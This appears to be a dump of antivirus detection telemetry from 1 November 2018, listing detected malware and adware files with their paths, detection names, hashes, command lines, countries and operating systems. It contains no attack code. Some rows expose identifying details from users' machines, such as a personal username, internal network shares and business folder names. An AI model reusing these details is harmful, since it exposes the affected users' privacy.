  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9621861\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_1925008174.exe', parentsize=2610712, timestamp='2018-11-01T18:52:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe539_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe539 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:22:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T16:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T11:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-21-57-26.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161303-dd29df01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161303-DD29DF01', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:01:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emailloginnow.exe.148639.gzquar', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\7T7AVDAZ\\emailloginnow.exe.148639.gzquar', filesize=652000, name='HEUR/AGEN.1020989.#M1.#R1'), hash='0f35d300d9b6d218d692750ec255066d606c18b89946187d55c2430b9848bee9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T19:08:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-072424-1b63421a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d1bc712\\AVSCAN-20181101-072411-194848AD\\AVSCAN-20181101-072424-1B63421A', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:54:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105909-a1283a40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105909-A1283A40', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7.3.4.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\7.3.4.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='56545830ece43b47c261f391cacea26ede1436d91aa65e79db323ee3cae9e2dc.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\56545830ECE43B47C261F391CACEA26EDE1436D91AA65E79DB323EE3CAE9E2DC.VIR', filesize=512000, name='TR/Dropper.Gen.#M300.#R4954'), hash='56545830ece43b47c261f391cacea26ede1436d91aa65e79db323ee3cae9e2dc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:51:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170445-332e24d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a667259\\AVSCAN-20181101-170435-31A3DD08\\AVSCAN-20181101-170445-332E24D4', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T10:18:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T13:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9b7e664511f94132ef0a775ad486784e64fe409ceced654bb34d3e2fde6928e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\9B7E664511F94132EF0A775AD486784E64FE409CECED654BB34D3E2FDE6928E4', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='9b7e664511f94132ef0a775ad486784e64fe409ceced654bb34d3e2fde6928e4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182716-4379d96d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_87aa883d\\AVSCAN-20181101-182407-2060EB23\\AVSCAN-20181101-182716-4379D96D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110247-bc9d41d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110247-BC9D41D0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131629-74ad4ebc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-131529-41BE397F\\AVSCAN-20181101-131629-74AD4EBC', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013156-f72189e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013008-E1F1B96F\\AVSCAN-20181102-013156-F72189E4', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f017c98a0589fdf274a5d1d06f2e639b87215010d6ee79f2366372a8941061f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DB96342FFA58D091C3392B128B81806BF029DA4AE8ACCA521F5A091FEC682A85', filesize=1856000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:04:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101633-fd92b7e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1bb9d718\\AVSCAN-20181101-101121-BFCCFA4D\\AVSCAN-20181101-101633-FD92B7E9', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:16:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163122-a3faca4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163021-98EBD175\\AVSCAN-20181101-163122-A3FACA4F', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsiB81B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6541008, timestamp='2018-11-01T10:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112020-416e77a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112020-416E77A9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbscript.exe', filepath='c:\\program files (x86)\\otter32\\vbscript.exe', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=60416, timestamp='2018-11-01T18:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='goral.exe', filepath='C:\\Program Files (x86)\\Goral\\Goral.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502864, timestamp='2018-11-01T16:03:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214913-63a42e1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce119106\\AVSCAN-20181101-214829-5D8C5858\\AVSCAN-20181101-214913-63A42E1C', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:49:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090847-1d2a07aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224821-B9828F66\\AVSCAN-20181102-090847-1D2A07AA', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.675\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.675\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:03:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5959d734004b289f3cc9650d41429b70d489aca6301d78d1aa4465a5476ba8f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\5959D734004B289F3CC9650D41429B70D489ACA6301D78D1AA4465A5476BA8F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5959d734004b289f3cc9650d41429b70d489aca6301d78d1aa4465a5476ba8f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003416-8516e505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003416-8516E505', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201158-d43e1454', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e63eb37\\AVSCAN-20181101-201034-C88B682C\\AVSCAN-20181101-201158-D43E1454', filesize=192000, name='HEUR/AGEN.1029143.#M1.#R1'), hash='1f31b0b71a36f47208ff26093a0869fa3fb4b5a32e74ea0688aff9819450143a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:42:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5031014e-d742-0581-d98c-fcdc94f3e8a7.exe', filepath='F:\\{3ece4525-9af3-c5dc-fc94-d2ae8e8f3e60}\\5031014e-d742-0581-d98c-fcdc94f3e8a7.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T06:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T05:31:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184155-a14c2e28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184155-A14C2E28', filesize=64000, name='VBA/Dldr.Agent.jukqc.#M1.#R1'), hash='5683af30e18e6be9c15efdae5a762aee27e478307b1ee82893f43d8809dd2c74', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:41:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-htmlfix_setup.exe', filepath='\\\\192.168.178.55\\Archiv\\Archiv_Einzelunternehmen_cispenhofen\\Jupiter_Sicherung\\Tagessicherung\\01.09.2012_Dropbox_backup\\Tausch\\Downloader-fuer-htmlfix_setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1ad3dc1b91444427813e416a12f0860a4dac55c14cf561e4df068c60bc6b2206', metadata=Row(cmdline='\\\\\\\\\\\\\\\\192.168.178.55\\\\\\\\Archiv \\\\\\\\\\\\\\\\192.168.178.97\\\\\\\\Archiv \\\\\\/mir \\\\\\/R:1 \\\\\\/W:1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\Robocopy.exe', parentsize=103936, timestamp='2018-11-01T16:30:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234802-5581663e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d68cdde\\AVSCAN-20181101-234747-528028A6\\AVSCAN-20181101-234802-5581663E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:48:39Z'), dt=datetime.date(2018, 11, 1)),
